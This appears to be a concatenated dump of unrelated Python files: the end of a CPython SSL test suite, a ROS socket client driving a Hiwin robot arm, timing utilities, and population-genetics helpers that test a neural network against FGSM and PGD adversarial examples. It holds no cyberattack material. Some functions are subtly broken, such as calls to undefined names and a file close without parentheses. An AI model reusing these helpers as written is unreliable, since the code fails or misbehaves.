def cb_raising(ssl_sock, server_name, initial_context):
1.0/0.0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
Hiwin_RT605_ArmCommand_Socket_20190627194540.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
#Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,data
s = client()
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", s)
#Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
s.send(data)
##-----------socket client--------
def socket_client():
try:
#Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.get_recieve())
Socket_feedback(Socket)
# while 1:
# feedback_str = Socket.recv(1024)
# #手臂端傳送手臂狀態
# if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
# state_feedback.ArmState = 0
# if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
# state_feedback.ArmState = 1
# if str(feedback_str[2]) == '54':# 6 策略完成
# state_feedback.ArmState = 6
# print("shutdown")
# #確認傳送旗標
# if str(feedback_str[4]) == '48':#回傳0 false
# state_feedback.SentFlag = 0
# if str(feedback_str[4]) == '49':#回傳1 true
# state_feedback.SentFlag = 1
# ##---------------socket 傳輸手臂命令 end-----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
utils.py
|
from timeit import default_timer as timer
import multiprocessing as mp
import math
class TicToc():
def __init__(self):
self.t = None
self.results = {}
def tic(self):
self.t = timer()
def toc(self, name):
if self.t is None:
raise RuntimeError('Timer not started')
diff = timer() - self.t
self.t = None
if name in self.results:
self.results[name].append(diff)
else:
self.results[name] = [diff]
def histogram(self, show=True, save_to=None, figsize=None):
import matplotlib.pyplot as plt
num_subplots = len(self.results)
if figsize is None:
figsize = (num_subplots * 5, 5)
figure, axes = plt.subplots(1, num_subplots, figsize=figsize)
if num_subplots == 1:
axes = [axes]
for idx, (name, vals) in enumerate(self.results.items()):
axes[idx].hist(vals)
axes[idx].set_xlabel('time / s')
axes[idx].title.set_text(name)
axes[idx].set_yscale('log', nonposy='clip')
if save_to is not None:
figure.savefig(save_to)
if show:
plt.show()
else:
plt.close(figure)
def _wrapped_target(pipe_conn: 'mp.connection.Connection'):
target, args = pipe_conn.recv()
res = target(*args)
pipe_conn.send(res)
def run_with_timeout(target, timeout, args=()):
"""Wraps target function into a subprocess where arguments and result are transferred via pipes. Terminates process after timeout seconds. Returns if finished by its own and function result"""
parent_conn, child_conn = mp.Pipe()
proc = mp.Process(target=_wrapped_target, args=(child_conn,))
proc.start()
parent_conn.send((target, args))
proc.join(timeout=timeout)
if proc.is_alive():
proc.terminate()
proc.join()
return False, None
else:
res = parent_conn.recv()
return True, res
def _wrapped_target_persistent(pipe_conn: 'mp.connection.Connection'):
while True:
target, args = pipe_conn.recv()
res = target(*args)
pipe_conn.send(res)
class PersistentWorker():
def __init__(self):
self.process = None
self.connection = None
def call(self, target, args, timeout):
if self.process is None:
self.connection, child_conn = mp.Pipe()
self.process = mp.Process(target=_wrapped_target_persistent, args=(child_conn,))
self.process.start()
self.connection.send((target, args))
if not self.connection.poll(timeout):
self.process.terminate()
self.process.join()
self.process = None
return False, None
else:
res = self.connection.recv()
return True, res
def terminate(self):
if self.process is not None:
self.process.terminate()
self.process.join()
self.process = None
self.connection = None
def abbrev_count(count):
log_count = math.floor(math.log10(count))
k_exponent = math.floor(log_count / 3)
suffixes = ['', 'k', 'm']
return '{:g}{}'.format(count / 10**(k_exponent*3), suffixes[k_exponent])
def dataset_name(num_aps, tree_size, num_formulas, polish=True, unsat_frac=0.0, simplify=False, require_trace=True, name_prefix=None, **kwargs):
folder = name_prefix + '-' if name_prefix is not None else ''
if isinstance(tree_size, int):
tree_size = str(tree_size)
else:
tree_size = str(tree_size[0]) + '-' + str(tree_size[1])
folder_substrs = ['na', str(num_aps), 'ts', tree_size, 'nf']
folder_substrs.append(abbrev_count(num_formulas))
folder += '-'.join(folder_substrs)
if polish:
folder += '-lbt'
if unsat_frac <= 0.0:
folder += '-sat'
else:
folder += '-unsat-' + str(unsat_frac)
if simplify:
folder += '-simpl'
if not require_trace:
folder += '-open'
return folder
|
helpers.py
|
'''
Authors: Jared Galloway, Jeff Adrion
'''
from iai.imports import *
from iai.sequenceBatchGenerator import *
#-------------------------------------------------------------------------------------------
def log_prior(theta):
''' The natural logarithm of the prior probability. '''
lp = 0.
# unpack the model parameters from the tuple
m, c = theta
# uniform prior on c
cmin = -10. # lower range of prior
cmax = 10. # upper range of prior
# set prior to 1 (log prior to 0) if in the range and zero (-inf) outside the range
lp = 0. if cmin < c < cmax else -np.inf
# Gaussian prior on m
mmu = 3. # mean of the Gaussian prior
msigma = 10. # standard deviation of the Gaussian prior
lp -= 0.5*((m - mmu)/msigma)**2
return lp
#-------------------------------------------------------------------------------------------
def log_like(theta, data, sigma, x):
'''The natural logarithm of the likelihood.'''
# unpack the model parameters
m, c = theta
# evaluate the model
md = straight_line(x, m, c)
# return the log likelihood
return -0.5 * np.sum(((md - data)/sigma)**2)
#-------------------------------------------------------------------------------------------
def log_post(theta, data, sigma, x):
'''The natural logarithm of the posterior.'''
return logprior(theta) + loglike(theta, data, sigma, x)
#-------------------------------------------------------------------------------------------
def log_prob(x, mu, icov):
return -0.5 * np.dot(np.dot((x-mu).T,icov),(x-mu))
#-------------------------------------------------------------------------------------------
def assign_task(mpID, task_q, nProcs):
c,i,nth_job=0,0,1
while (i+1)*nProcs <= len(mpID):
i+=1
nP1=nProcs-(len(mpID)%nProcs)
for j in range(nP1):
task_q.put((mpID[c:c+i], nth_job))
nth_job += 1
c=c+i
for j in range(nProcs-nP1):
task_q.put((mpID[c:c+i+1], nth_job))
nth_job += 1
c=c+i+1
#-------------------------------------------------------------------------------------------
def create_procs(nProcs, task_q, result_q, params, worker):
pids = []
for _ in range(nProcs):
p = mp.Process(target=worker, args=(task_q, result_q, params))
p.daemon = True
p.start()
pids.append(p)
return pids
#-------------------------------------------------------------------------------------------
def get_corrected_index(L,N):
idx,outN="",""
dist=float("inf")
for i in range(len(L)):
D=abs(N-L[i])
if D < dist:
idx=i
outN=L[i]
dist=D
return [idx,outN]
#-------------------------------------------------------------------------------------------
def get_corrected(rate,bs):
idx=get_corrected_index(bs["Q2"],rate)
CI95LO=bs["CI95LO"][idx[0]]
CI95HI=bs["CI95HI"][idx[0]]
cRATE=relu(rate+(bs["rho"][idx[0]]-idx[1]))
ciHI=relu(cRATE+(CI95HI-idx[1]))
ciLO=relu(cRATE+(CI95LO-idx[1]))
return [cRATE,ciLO,ciHI]
#-------------------------------------------------------------------------------------------
def get_index(pos, winSize):
y=snps_per_win(pos,winSize)
st=0
indices=[]
for i in range(len(y)):
indices.append([st,st+y[i]])
st+=y[i]
return indices
#-------------------------------------------------------------------------------------------
def snps_per_win(pos, window_size):
bins = np.arange(1, pos.max()+window_size, window_size) #use 1-based coordinates, per VCF standard
y,x = np.histogram(pos,bins=bins)
return y
#-------------------------------------------------------------------------------------------
def find_win_size(winSize, pos, winSizeMx):
snpsWin=snps_per_win(pos,winSize)
mn,u,mx = snpsWin.min(), int(snpsWin.mean()), snpsWin.max()
if mx > winSizeMx:
return [-1]
elif mx < winSizeMx:
return [1]
else:
return [winSize,mn,u,mx,len(snpsWin)]
#-------------------------------------------------------------------------------------------
def force_win_size(winSize, pos):
snpsWin=snps_per_win(pos,winSize)
mn,u,mx = snpsWin.min(), int(snpsWin.mean()), snpsWin.max()
return [winSize,mn,u,mx,len(snpsWin)]
#-------------------------------------------------------------------------------------------
def maskStats(wins, last_win, mask, maxLen):
"""
return a three-element list with the first element being the total proportion of the window that is masked,
the second element being a list of masked positions that are relative to the windown start=0 and the window end = window length,
and the third being the last window before breaking to expidite the next loop
"""
chrom = wins[0].split(":")[0]
a = wins[1]
L = wins[2]
b = a + L
prop = [0.0,[],0]
try:
for i in range(last_win, len(mask[chrom])):
x, y = mask[chrom][i][0], mask[chrom][i][1]
if y < a:
continue
if b < x:
return prop
else: # i.e. [a--b] and [x--y] overlap
if a >= x and b <= y:
return [1.0, [[0,maxLen]], i]
elif a >= x and b > y:
win_prop = (y-a)/float(b-a)
prop[0] += win_prop
prop[1].append([0,int(win_prop * maxLen)])
prop[2] = i
elif b <= y and a < x:
win_prop = (b-x)/float(b-a)
prop[0] += win_prop
prop[1].append([int((1-win_prop)*maxLen),maxLen])
prop[2] = i
else:
win_prop = (y-x)/float(b-a)
prop[0] += win_prop
prop[1].append([int(((x-a)/float(b-a))*maxLen), int(((y-a)/float(b-a))*maxLen)])
prop[2] = i
return prop
except KeyError:
return prop
#-------------------------------------------------------------------------------------------
def check_demHist(path):
fTypeFlag = -9
with open(path, "r") as fIN:
for line in fIN:
if line.startswith("mutation_per_site"):
fTypeFlag = 1
break
if line.startswith("label"):
fTypeFlag = 2
break
if line.startswith("time_index"):
fTypeFlag = 3
break
return fTypeFlag
#-------------------------------------------------------------------------------------------
def convert_msmc_output(results_file, mutation_rate, generation_time):
"""
This function converts the output from msmc into a csv the will be read in for
plotting comparison.
MSMC outputs times and rates scaled by the mutation rate per basepair per generation.
First, scaled times are given in units of the per-generation mutation rate.
This means that in order to convert scaled times to generations,
divide them by the mutation rate. In humans, we used mu=1e-8 per basepair per generation.
To convert generations into years, multiply by the generation time, for which we used 10 years.
To get population sizes out of coalescence rates, first take the inverse of the coalescence rate,
scaledPopSize = 1 / lambda00. Then divide this scaled population size by 2*mu
"""
outfile = results_file+".csv"
out_fp = open(outfile, "w")
in_fp = open(results_file, "r")
header = in_fp.readline()
out_fp.write("label,x,y\n")
for line in in_fp:
result = line.split()
time = float(result[1])
time_generation = time / mutation_rate
time_years = time_generation * generation_time
lambda00 = float(result[3])
scaled_pop_size = 1 / lambda00
size = scaled_pop_size / (2*mutation_rate)
out_fp.write(f"pop0,{time_years},{size}\n")
out_fp.close
return None
#-------------------------------------------------------------------------------------------
def convert_demHist(path, nSamps, gen, fType, mu):
swp, PC, DE = [],[],[]
# Convert stairwayplot to msp demographic_events
if fType == 1:
with open(path, "r") as fIN:
flag=0
lCt=0
for line in fIN:
if flag == 1:
if lCt % 2 == 0:
swp.append(line.split())
lCt+=1
if line.startswith("mutation_per_site"):
flag=1
N0 = int(float(swp[0][6]))
for i in range(len(swp)):
if i == 0:
PC.append(msp.PopulationConfiguration(sample_size=nSamps, initial_size=N0))
else:
DE.append(msp.PopulationParametersChange(time=int(float(swp[i][5])/float(gen)), initial_size=int(float(swp[i][6])), population=0))
## Convert MSMC to similar format to smc++
if fType == 3:
convert_msmc_output(path, mu, gen)
path+=".csv"
## Convert smc++ or MSMC results to msp demographic_events
if fType == 2 or fType == 3:
with open(path, "r") as fIN:
fIN.readline()
for line in fIN:
ar=line.split(",")
swp.append([int(float(ar[1])/gen),int(float(ar[2]))])
N0 = swp[0][1]
for i in range(len(swp)):
if i == 0:
PC.append(msp.PopulationConfiguration(sample_size=nSamps, initial_size=N0))
else:
DE.append(msp.PopulationParametersChange(time=swp[i][0], initial_size=swp[i][1], population=0))
dd=msp.DemographyDebugger(population_configurations=PC,
demographic_events=DE)
print("Simulating under the following population size history:")
dd.print_history()
MspD = {"population_configurations" : PC,
"migration_matrix" : None,
"demographic_events" : DE}
if MspD:
return MspD
else:
print("Error in converting demographic history file.")
sys.exit(1)
#-------------------------------------------------------------------------------------------
def relu(x):
return max(0,x)
#-------------------------------------------------------------------------------------------
def zscoreTargets(self):
norm = self.targetNormalization
nTargets = copy.deepcopy(self.infoDir['y'])
if(norm == 'zscore'):
tar_mean = np.mean(nTargets,axis=0)
tar_sd = np.std(nTargets,axis=0)
nTargets -= tar_mean
nTargets = np.divide(nTargets,tar_sd,out=np.zeros_like(nTargets),where=tar_sd!=0)
#-------------------------------------------------------------------------------------------
def load_and_predictVCF(VCFGenerator,
resultsFile=None,
network=None,
minS = 50,
gpuID = 0,
hotspots = False):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpuID)
# load json and create model
if(network != None):
jsonFILE = open(network[0],"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(network[1])
else:
print("Error: no pretrained network found!")
sys.exit(1)
x,chrom,win,info,nSNPs = VCFGenerator.__getitem__(0)
predictions = model.predict(x)
if hotspots:
with open(resultsFile, "w") as fOUT:
ct=0
fOUT.write("%s\t%s\t%s\t%s\t%s\n" %("chrom","start","end","nSites","hotspot"))
for i in range(len(predictions)):
if nSNPs[i] >= minS:
fOUT.write("%s\t%s\t%s\t%s\t%s\n" %(chrom,ct,ct+win,nSNPs[i],predictions[i][0]))
ct+=win
else:
u=np.mean(info["rho"])
sd=np.std(info["rho"])
last = int(os.path.basename(resultsFile).split(".")[0].split("-")[-1])
with open(resultsFile, "w") as fOUT:
ct=0
fOUT.write("%s\t%s\t%s\t%s\t%s\n" %("chrom","start","end","nSites","recombRate"))
for i in range(len(predictions)):
if nSNPs[i] >= minS:
fOUT.write("%s\t%s\t%s\t%s\t%s\n" %(chrom,ct,min(ct+win,last),nSNPs[i],relu(sd*predictions[i][0]+u)))
ct+=win
return None
#-------------------------------------------------------------------------------------------
class TimingCallback(tf.keras.callbacks.Callback):
def __init__(self, logs={}):
self.logs=[]
def on_epoch_begin(self, epoch, logs={}):
self.starttime = timer()
def on_epoch_end(self, epoch, logs={}):
self.logs.append(timer()-self.starttime)
#-------------------------------------------------------------------------------------------
def runModels_cleverhans_tf2(ModelFuncPointer,
ModelName,
NetworkDir,
ProjectDir,
TrainGenerator,
ValidationGenerator,
TestGenerator,
TrainParams=None,
ValiParams=None,
TestParams=None,
resultsFile=None,
numEpochs=10,
epochSteps=100,
validationSteps=1,
initModel=None,
initWeights=None,
network=None,
nCPU = 1,
gpuID = 0,
attackFraction=0.0,
attackBatchSize=None,
rep=None,
FGSM=False,
PGD=False):
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuID)
## The following code block appears necessary for running with tf2 and cudnn
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import Session
config = ConfigProto()
config.gpu_options.allow_growth = True
Session(config=config)
###
if(resultsFile == None):
resultsFilename = os.path.basename(trainFile)[:-4] + ".p"
resultsFile = os.path.join("./results/",resultsFilename)
# Store original batch_size for train and vali sets and total numReps
og_train_bs = TrainParams["batchSize"]
tmpDir = TrainParams['treesDirectory']
infoP = pickle.load(open(os.path.join(tmpDir,"info.p"),"rb"))
og_train_numReps = infoP["numReps"]
og_vali_bs = ValiParams["batchSize"]
tmpDir = ValiParams['treesDirectory']
infoP = pickle.load(open(os.path.join(tmpDir,"info.p"),"rb"))
og_vali_numReps = infoP["numReps"]
og_test_bs = TestParams["batchSize"]
og_test_dir = TestParams['treesDirectory']
infoP = pickle.load(open(os.path.join(og_test_dir,"info.p"),"rb"))
og_test_numReps = infoP["numReps"]
# Call the generator
x,y = TrainGenerator.__getitem__(0)
# If TestGenerator is called after model.fit the random shuffling is not the same, even with same seed
x_test,y_test = TestGenerator.__getitem__(0)
img_rows, img_cols = x_test.shape[1], x_test.shape[2]
## define model
model = ModelFuncPointer(x,y)
TimingCB = TimingCallback()
# Early stopping and saving the best weights
callbacks_list = [
EarlyStopping(
monitor='val_loss',
verbose=1,
min_delta=0.01,
patience=25),
ModelCheckpoint(
filepath=network[1],
monitor='val_loss',
save_best_only=True),
TerminateOnNaN(),
TimingCB
]
if initWeights:
print("Loading model/weights from path!")
assert initModel != None
jsonFILE = open(initModel,"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(initWeights)
else:
history = model.fit(TrainGenerator,
epochs=numEpochs,
validation_data=ValidationGenerator,
use_multiprocessing=False,
callbacks=callbacks_list,
verbose=1)
# Write the network
if(network != None):
##serialize model to JSON
model_json = model.to_json()
with open(network[0], "w") as json_file:
json_file.write(model_json)
# Load json and create model
if(network != None):
jsonFILE = open(network[0],"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(network[1])
else:
print("Error: model and weights not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc_clean = tf.metrics.CategoricalAccuracy()
test_acc_fgsm = tf.metrics.CategoricalAccuracy()
test_acc_pgd = tf.metrics.CategoricalAccuracy()
# predict on clean test examples
print("\nPredicting on clean examples...")
y_pred = model.predict(x_test)
test_acc_clean(y_test, y_pred)
print('test acc on clean examples (%): {:.3f}'.format(test_acc_clean.result() * 100))
if FGSM:
# predict on adversarial test examples using FGSM
print("\nAttacking using Fast Gradient Sign Method...")
fgsm_params = {'eps': 1.0,
'norm': np.inf,
'clip_min': 0.0,
'clip_max': 1.0}
# define the attack generator for test examples
adv_test_params = copy.deepcopy(TestParams)
adv_test_params["model"] = model
adv_test_params["attackName"] = "fgsm"
adv_test_params["attackParams"] = fgsm_params
adv_test_params["attackFraction"] = 1.0
adv_test_params["writeAttacks"] = True
adv_test_params["batchSize"] = attackBatchSize
attackGen_test = SequenceBatchGenerator(**adv_test_params)
# attack the entire test set and write adversarial examples to disk
print("Attacking the test set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_test_numReps/float(adv_test_params["batchSize"])))
t0 = time.perf_counter()
for i in range(num_batches):
attackGen_test.__getitem__(i)
progress_bar(i/float(num_batches))
progress_bar(num_batches/float(num_batches))
t1 = time.perf_counter()
print("\nAverage time per FGSM attack (s):", round((t1-t0)/float(og_test_numReps),6))
# reset generator parameters
adv_test_dir = og_test_dir + "_fgsm_rep%s"%(rep)
cmd = "cp %s %s"%(os.path.join(og_test_dir,"info.p"), os.path.join(adv_test_dir,"info.p"))
os.system(cmd)
adv_test_params["treesDirectory"] = adv_test_dir
adv_test_params["attackFraction"] = 0.0
adv_test_params["writeAttacks"] = False
adv_test_params["batchSize"] = og_test_bs
attackGen_test = SequenceBatchGenerator(**adv_test_params)
x_fgsm, y_fgsm = attackGen_test.__getitem__(0)
print("\nPredicting on FGSM examples...")
y_pred_fgsm = model.predict(x_fgsm)
test_acc_fgsm(y_test, y_pred_fgsm)
print('test acc on FGSM adversarial examples (%): {:.3f}'.format(test_acc_fgsm.result() * 100))
if PGD:
# predict on adversarial test examples using PGD
print("\nAttacking using Projected Gradient Descent...")
pgd_params = {'eps': 1.0,
'eps_iter': 1.0,
'nb_iter': 40,
'norm': np.inf,
'clip_min': 0.0,
'clip_max': 1.0,
'sanity_checks': False}
# define the attack generator for test examples
adv_test_params = copy.deepcopy(TestParams)
adv_test_params["model"] = model
adv_test_params["attackName"] = "pgd"
adv_test_params["attackParams"] = pgd_params
adv_test_params["attackFraction"] = 1.0
adv_test_params["writeAttacks"] = True
adv_test_params["batchSize"] = attackBatchSize
attackGen_test = SequenceBatchGenerator(**adv_test_params)
# attack the entire test set and write adversarial examples to disk
print("Attacking the test set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_test_numReps/float(adv_test_params["batchSize"])))
t0 = time.perf_counter()
for i in range(num_batches):
attackGen_test.__getitem__(i)
progress_bar(i/float(num_batches))
progress_bar(num_batches/float(num_batches))
t1 = time.perf_counter()
print("\nAverage time per PGD attack (s):", round((t1-t0)/float(og_test_numReps),6))
# reset generator parameters
adv_test_dir = og_test_dir + "_pgd_rep%s"%(rep)
cmd = "cp %s %s"%(os.path.join(og_test_dir,"info.p"), os.path.join(adv_test_dir,"info.p"))
os.system(cmd)
adv_test_params["treesDirectory"] = adv_test_dir
adv_test_params["attackFraction"] = 0.0
adv_test_params["writeAttacks"] = False
adv_test_params["batchSize"] = og_test_bs
attackGen_test = SequenceBatchGenerator(**adv_test_params)
x_pgd, y_pgd = attackGen_test.__getitem__(0)
print("\nPredicting on PGD examples...")
y_pred_pgd = model.predict(x_pgd)
test_acc_pgd(y_test, y_pred_pgd)
print('test acc on PGD adversarial examples (%): {:.3f}'.format(test_acc_pgd.result() * 100))
# Tally results
print("results written to: ",resultsFile)
history.history["fit_time"] = TimingCB.logs
history.history['loss'] = np.array(history.history['loss'])
history.history['val_loss'] = np.array(history.history['val_loss'])
history.history['predictions'] = np.array(y_pred)
if FGSM:
history.history['predictions_fgsm'] = np.array(y_pred_fgsm)
if PGD:
history.history['predictions_pgd'] = np.array(y_pred_pgd)
history.history['Y_test'] = np.array(y_test)
history.history['name'] = ModelName
pickle.dump(history.history, open(resultsFile, "wb" ))
if FGSM or PGD:
# Save genotype images for testset
print("\nSaving adversarial images...")
if rep:
